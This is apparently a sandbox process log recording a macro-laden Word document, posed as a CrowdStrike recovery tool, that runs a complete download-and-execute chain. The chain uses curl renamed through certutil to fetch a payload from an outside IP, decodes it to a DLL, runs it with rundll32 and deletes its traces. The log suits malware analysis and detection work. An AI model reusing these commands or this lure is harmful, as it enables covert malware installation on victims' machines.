WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
2552
cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
2708
xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp
2780
certutil.exe certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt
2824
certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe
2868
certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll
2924
rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain
2972